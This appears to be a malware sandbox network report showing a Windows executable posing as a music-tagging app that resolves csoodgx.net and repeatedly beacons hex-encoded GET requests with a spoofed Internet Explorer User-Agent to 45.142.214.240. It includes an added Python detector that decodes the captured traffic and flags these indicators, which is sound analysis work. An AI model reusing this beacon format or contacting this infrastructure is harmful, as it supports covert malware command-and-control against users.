                                                                          Mar 29, 2024 12:10:32.564323902 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.566004992 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.566093922 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.566268921 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.784776926 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.863929033 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.864131927 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.982726097 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.983026981 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.200566053 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.200802088 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.201024055 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.201478004 CET804977245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.201555014 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.418368101 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.519715071 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.519792080 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.639424086 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.639847994 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.857043982 CET804977345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.857213974 CET4977380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.860416889 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:33.860490084 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:33.860666037 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.081404924 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.174215078 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.174276114 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.295346975 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.295639038 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.515904903 CET804977445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.515974998 CET4977480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.517797947 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.517878056 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.518099070 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.740305901 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.819152117 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:34.819207907 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.936032057 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:34.936417103 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.155791044 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.155885935 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.156161070 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.158416033 CET804977545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.158487082 CET4977580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.375344038 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.474606991 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.474710941 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.592494965 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.592895031 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.810530901 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.810642004 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.810868979 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:35.811729908 CET804977645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:35.811820984 CET4977680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.028398991 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.107671022 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.107750893 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.217358112 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.435029984 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.519197941 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.519309044 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.639288902 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.639698029 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.857177019 CET804977745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.857300043 CET4977780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.862006903 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:36.862106085 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:36.862356901 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.084763050 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.167140961 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.167206049 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.279850006 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.280252934 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.497788906 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.497896910 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.498092890 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.502238035 CET804977845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.502320051 CET4977880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.715713024 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.795223951 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:37.795305967 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.906009912 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:37.906377077 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.123675108 CET804977945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.123845100 CET4977980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.126919031 CET804978045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:38.127011061 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.127295971 CET4978080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:38.348558903 CET804978045.142.214.240192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 12:09:44.802397013 CET | 51540 | 53 | 192.168.2.5 | 141.98.234.31
Mar 29, 2024 12:09:45.142661095 CET | 53 | 51540 | 141.98.234.31 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 29, 2024 12:09:44.802397013 CET | 192.168.2.5 | 141.98.234.31 | 0xf7b9 | Standard query (0) | csoodgx.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 29, 2024 12:09:45.142661095 CET | 141.98.234.31 | 192.168.2.5 | 0xf7b9 | No error (0) | csoodgx.net | (none) | 45.142.214.240 | A (IP address) | IN (0x0001) | false
                                                                          • csoodgx.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:45.420994043 CET | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:45.725605965 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:46.064559937 CET | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:46.396110058 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 35 32 65 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 37 34 36 61 63 37 64 66 66 37 39 61 38 33 62 35 35 64 65 66 66 64 31 30 66 63 61 34 30 63 64 37 64 62 62 31 31 66 37 33 36 39 34 32 35 65 37 30 65 61 37 36 30 63 34 34 64 62 38 65 36 34 34 65 38 35 61 37 66 34 38 65 64 32 37 36 32 38 62 33 61 36 66 38 66 65 31 31 30 63 36 66 31 39 34 39 63 33 66 63 37 36 65 39 36 31 36 64 38 35 62 38 65 32 32 62 33 34 37 62 32 65 61 35 66 33 66 65 66 37 39 64 35 65 33 37 63 62 39 38 35 65 65 64 35 34 61 65 36 33 35 63 61 31 65 32 62 35 63 35 32 32 30 66 64 32 33 37 37 31 36 36 32 62 31 65 36 38 65 66 65 38 36 32 36 35 37 65 33 34 32 37 39 32 30 65 30 32 62 35 65 66 33 65 32 65 35 38 38 66 38 33 34 37 61 61 34 65 64 34 37 39 39 38 36 66 62 37 64 33 39 31 30 62 66 37 36 65 64 39 39 63 63 61 63 36 34 64 34 36 64 30 66 32 39 33 31 36 34 61 37 35 36 63 62 63 33 61 66 33 39 32 61 61 34 63 38 30 36 61 36 30 31 62 30 61 38 33 33 62 38 63 35 63 30 33 37 37 63 33 34 30 61 64 35 32 65 65 38 31 30 66 30 64 30 62 62 30 64 34 63 64 32 33 66 31 38 63 30 35 30 63 35 66 32 36 36 39 38 33 33 62 35 39 32 35 37 62 63 65 33 64 31 61 63 63 61 33 38 32 33 62 65 37 38 62 36 65 63 30 32 39 65 62 65 62 64 37 31 35 64 62 65 38 35 66 32 33 66 61 38 66 38 38 66 38 35 31 66 65 64 31 66 65 33 35 39 38 35 35 32 36 64 63 37 62 34 64 66 66 63 64 63 34 61 37 39 61 33 39 64 65 38 33 30 61 65 37 34 38 39 30 66 33 63 61 61 32 62 64 30 32 36 64 63 39 65 30 30 64 35 35 38 62 37 32 66 30 33 31 34 35 62 63 62 64 37 36 65 35 37 33 61 35 62 36 30 39 62 66 65 39 30 32 63 32 62 37 65 34 64 31 33 63 39 63 38 62 32 31 30 31 33 66 36 64 37 62 63 65 38 63 33 33 35 37 63 37 64 66 39 33 
37 38 63 64 63 30 34 30 38 34 36 39 37 61 39 63 34 30 33 34 37 34 35 64 63 37 38 36 62 35 38 33 36 34 64 66 64 64 32 64 30 64 32 66 31 63 65 35 35 39 36 33 64 36 63 34 65 66 35 37 35 33 31 39 63 32 61 62 37 63 39 38 64 37 65 38 61 34 61 63 31 38 62 32 30 31 36 30 65 36 31 39 64 66 63 39 66 65 32 31 64 31 31 61 30 32 66 39 34 64 39 31 31 37 30 31 64 64 63 33 65 63 63 66 65 39 30 30 64 37 36 33 35 37 61 39 63 33 64 30 37 66 33 35 64 34 36 37 38 37 39 38 66 34 65 63 34 62 61 61 31 65 32 33 65 61 32 64 31 63 32 31 30 35 39 38 35 32 35 64 36 34 61 35 36 39 33 62 33 64 33 36 32 63 63 35 30 33 64 62 32 36 32 65 30 32 64 32 36 62 33 36 34 38 62 35 63 31 66 64 31 61 35 61 35 61 39 37 31 61 35 63 35 30 39 38 63 34 66 64 65 64 34 63 61 34 62 61 64 31 30 62 63 34 32 66 32 61 62 61 65 36 34 39 62 62 30 32 66 61 62 32 65 32 62 30 64 33 35 63 65 38 39 37 39 31 63 65 39 61 31 63 30 34 35 37 61 66 36 32 36 33 38 33 34 31 35 31 63 64 61 33 30 61 33 34 33 61 66 31 63 39 32 34 31 64 64 61 62 63 39 39 34 34 64 65 37 34 30 38 39 39 65 62 31 63 31 32 61 31 30 64 33 32 66 32 65 61 65 38 35 35 65 63 31 35 61 30 36 30 61 34 61 63 63 34 30 31 33 34 31 33 62 34 33 30 61 66 61 39 64 34 61 34 39 61 30 30 38 33 32 63 61 66 32 61 30 31 63 63 61 66 35 37 31 62 30 65 35 66 63 66 35 31 39 32 37 36 65 64 66 30 30 63 65 63 37 31 37 61 36 35 61 66 65 34 30 32 61 37 33 61
                                                                          Data Ascii: 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
Mar 29, 2024 12:09:46.396125078 CET | 243 | IN | Data Raw: 63 64 32 34 36 62 61 38 64 31 33 30 36 32 37 66 33 63 64 33 32 63 65 63 31 39 66 64 64 64 38 62 30 36 38 38 62 64 35 33 30 33 36 33 31 30 38 33 33 62 63 37 37 32 62 66 30 61 31 66 35 61 61 62 37 33 66 31 66 64 33 61 33 63 66 39 63 35 64 66 62 66
                                                                          Data Ascii: cd246ba8d130627f3cd32cec19fddd8b0688bd53036310833bc772bf0a1f5aab73f1fd3a3cf9c5dfbf8a1473914bc4244e9bb1c06bf99463efeaedbc5e5ccb1b8c254b294cdaf49cb751d48c574f3e631aabd7ff4d09953b90c389ccc7e867770f93d00e6b7c4b56bac1688da8ac9057b856679b81c01d841
Mar 29, 2024 12:09:46.396133900 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0
Mar 29, 2024 12:09:48.936276913 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:49.290200949 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
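Every session above follows one pattern: a GET to /search/?q=<long hex> carrying only Host and User-Agent, a User-Agent that claims "Windows NT 9.0" (no Windows build reports that version) and omits the "compatible;" token real Internet Explorer sends, and a chunked text/html response whose body is nothing but hex. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it turns the report's "Data Raw" listing back into bytes, strips the HTTP/1.1 chunked framing to recover the payload, and scores a request/response pair against those indicators. The sample request and response are constructed from session 0 above; the benign control request, the minimum blob length and the list of known NT versions are the author's assumptions rather than anything the report states.

```python
import re
from typing import List

# Constructed sample modelled on session 0 of the report: the request as sent
# (only Host and User-Agent) and the response body exactly as the report
# prints it under "Data Raw" (space-separated hex bytes).
SAMPLE_REQUEST = (
    "GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1\r\n"
    "Host: csoodgx.net\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
    "\r\n"
)
SAMPLE_RESPONSE_RAW = "65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a"

# Made-up benign control: an ordinary browser fetch returning a normal HTML body.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0.0.0\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)
BENIGN_RESPONSE_RAW = " ".join("%02x" % b for b in b"d\r\n<html></html>\r\n0\r\n\r\n")

# Assumption (author's list, not from the report): NT versions real Windows reports.
KNOWN_NT = {"5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
HEX_RE = re.compile(r"^[0-9a-f]+$")


def decode_report_raw(raw: str) -> bytes:
    """Turn a 'Data Raw' listing ('65 0d 0a ...') back into the bytes on the wire."""
    return bytes.fromhex(raw.replace(" ", ""))


def dechunk(body: bytes) -> bytes:
    """Strip chunked framing: <hexsize>[;ext]CRLF <data> CRLF ... 0 CRLF CRLF.

    A body cut off before the terminating 0-chunk (as when the report's
    separate IN records are not concatenated first) yields what was recovered.
    """
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            break
        size = int(body[pos:end].split(b";", 1)[0].strip() or b"0", 16)
        pos = end + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF
    return bytes(out)


def parse_request(req: str) -> dict:
    """Split a raw HTTP request into method, target and a lower-cased header map."""
    lines = req.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def beacon_indicators(request: str, response_raw: str) -> List[str]:
    """Return the indicators a request/response pair matches; empty means no match."""
    req = parse_request(request)
    headers = req["headers"]
    hits: List[str] = []

    m = re.match(r"^/search/\?q=([0-9a-f]+)$", req["target"])
    if m and len(m.group(1)) >= 64:  # 64 is an assumed floor, not from the report
        hits.append("hex blob in /search/?q= (%d hex chars)" % len(m.group(1)))

    ua = headers.get("user-agent", "")
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt and nt.group(1) not in KNOWN_NT:
        hits.append("non-existent Windows NT version in User-Agent: " + nt.group(1))
    if "MSIE" in ua and "compatible;" not in ua:
        hits.append("MSIE token without the 'compatible;' token real IE sends")

    if set(headers) <= {"host", "user-agent"}:
        hits.append("request carries only Host and User-Agent headers")

    payload = dechunk(decode_report_raw(response_raw)).decode("ascii", "replace")
    if payload and HEX_RE.match(payload):
        hits.append("response body is bare hex (%d chars)" % len(payload))
    return hits


if __name__ == "__main__":
    print("payload:", dechunk(decode_report_raw(SAMPLE_RESPONSE_RAW)))
    for h in beacon_indicators(SAMPLE_REQUEST, SAMPLE_RESPONSE_RAW):
        print("-", h)
    print("benign hits:", beacon_indicators(BENIGN_REQUEST, BENIGN_RESPONSE_RAW))
```

For the 1286-byte response in session 1 the first five bytes are 35 32 65 0d 0a, i.e. a chunk-size line of "52e" (1326 bytes), which is longer than that single record: the report splits the reply over three IN records (1286, 243 and 5 bytes), so the three "Data Raw" listings must be concatenated before dechunk() sees the terminating 0-chunk. Fed the 220-byte replies, dechunk() returns the 14-character hex string that the report shows as "e67b680813008c20" with the chunk size and CRLFs still attached.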


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49716 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:49.624355078 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:49.931559086 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 34 39 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 65 64 32 65 61 31 37 31 36 66 35 61 32 35 63 65 61 31 64 64 35 66 62 38 63 65 37 39 37 38 37 34 64 38 62 34 64 64 62 65 30 63 30 33 37 33 34 62 39 34 64 66 38 64 35 64 61 31 61 32 35 65 33 37 32 35 38 61 64 37 65 66 37 36 34 61 63 32 64 35 34 63 38 66 66 63 64 30 39 63 36 35 64 63 63 37 62 62 34 31 61 66 65 33 33 38 61 32 36 65 66 31 31 61 65 36 33 64 62 35 32 62 38 65 33 35 30 65 66 35 38 37 38 35 64 65 39 32 34 36 64 39 34 33 62 36 37 38 65 66 34 31 32 63 38 66 31 39 34 39 32 33 62 64 33 36 39 39 33 30 38 64 63 35 38 38 35 32 39 62 36 35 39 62 38 65 66 35 61 33 66 65 66 37 61 63 63 66 63 37 61 62 64 39 31 65 64 64 31 34 38 65 63 33 66 63 39 31 36 33 35 35 36 35 38 32 30 65 34 33 62 37 31 30 61 37 38 62 62 65 64 38 61 65 30 38 37 32 38 35 37 65 63 35 64 37 62 32 31 66 35 32 62 35 38 65 39 66 65 65 37 38 38 65 34 33 66 37 33 62 61 65 63 34 65 39 38 38 35 66 62 37 61 32 63 31 34 62 35 37 36 65 62 39 65 64 35 62 31 36 36 63 66 36 61 30 30 32 32 33 32 36 34 61 63 35 63 63 61 64 38 62 33 33 38 32 62 62 66 64 37 30 63 62 63 30 39 61 37 61 33 33 33 62 63 63 66 63 38 33 30 37 34 32 61 30 35 64 32 33 38 65 65 30 64 65 66 64 33 62 39 31 39 34 64 64 34 32 31 31 36 63 32 35 66 64 38 66 33 36 33 39 36 32 63 62 34 39 33 34 30 61 33 65 61 64 31 62 36 63 31 33 66 32 33 61 30 37 61 62 39 65 62 30 30 39 61 61 30 62 63 37 33 35 31 61 31 38 65 66 30 33 66 61 63 66 66 38 35 39 38 31 61 65 66 30 61 65 35 35 32 38 61 34 64 36 63 63 66 62 65 63 30 66 34 64 64 35 34 36 35 62 66 39 66 65 39 32 34 61 64 37 37 38 66 30 35 33 34 61 62 32 32 64 66 33 39 64 39 39 65 31 65 63 61 35 65 62 33 32 66 30 63 31 35 34 66 63 62 64 34 36 38 35 36 33 38 35 32 36 35 38 65 66 64 38 36 32 66 33 32 36 32 34 61 31 33 64 31 63 31 62 33 30 65 31 32 66 39 64 30 62 32 65 38 64 64 33 34 37 34 37 32 65 32 32 
31 38 37 63 33 30 33 31 35 34 31 39 64 62 34 63 35 30 34 34 63 34 65 64 31 37 64 37 35 35 31 33 32 34 36 65 36 63 66 64 34 63 63 65 65 63 62 35 30 39 66 32 32 36 64 34 37 66 65 37 36 33 35 38 37 32 38 62 36 63 34 39 32 37 37 38 66 34 61 63 31 38 63 32 36 30 32 30 32 36 33 38 33 66 35 39 63 65 66 31 32 30 65 61 36 32 66 38 61 64 33 31 61 37 62 31 64 64 35 33 37 64 32 66 35 39 35 30 66 36 38 33 34 37 37 39 38 33 66 30 30 65 64 35 63 34 36 37 65 36 63 38 65 34 65 63 34 62 39 61 32 65 30 32 61 61 31 64 34 63 37 30 65 35 33 38 35 32 37 63 39 34 32 35 36 38 64 62 39 64 36 36 32 64 34 34 66 33 61 62 37 37 36 65 33 32 63 32 37 61 64 36 35 38 32 35 64 31 37 63 65 61 34 61 34 61 65 36 34 61 66 63 38 31 32 39 61 34 65 63 38 64 66 63 66 34 65 62 33 31 39 62 33 34 39 66 36 61 64 62 30 36 35 39 30 61 66 32 39 61 63 33 31 33 34 30 63 32 39 63 36 38 32 37 39 30 32 65 38 61 33 63 32 34 37 37 37 65 38 32 65 33 33 32 62 31 63 31 64 63 31 32 38 61 39 35 39 61 34 31 37 39 62 35 66 64 63 61 36 63 30 39 39 34 39 66 39 34 31 38 39 38 62 62 33 63 31 33 35 30 63 64 33 32 39 33 39 61 35 38 35 35 39 64 66 35 30 30 36 30 62 34 35 64 30 34 36 31 30 35 66 33 31 34 32 30 32 66 61 39 35 34 65 35 66 61 62 30 39 33 35 64 34 66 33 61 61 31 64 63 31 65 39 37 33 62 31 65 31 65 32 66 66 31 64 32 38 37 35 63 30 30 33 63 36 63 34 30 62 61 34 35 38 66 65 35 35 32 32 37 34 62
                                                                          Data Ascii: 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
Mar 29, 2024 12:09:49.931572914 CET | 104 | IN | Data Raw: 31 64 31 34 36 61 34 38 63 31 30 30 31 33 32 66 61 63 34 32 65 63 63 63 33 38 31 64 63 64 64 62 30 37 64 38 62 64 64 33 37 32 32 33 31 30 39 33 61 61 32 37 35 32 32 66 31 62 66 66 64 62 32 62 35 33 37 31 64 63 64 61 32 63 37 39 61 34 38 66 35 66
                                                                          Data Ascii: 1d146a48c100132fac42eccc381dcddb07d8bdd372231093aa27522f1bffdb2b5371dcda2c79a48f5f4b54d390abd47740


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49718 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:50.438858986 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:50.743694067 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49719 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:51.076317072 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
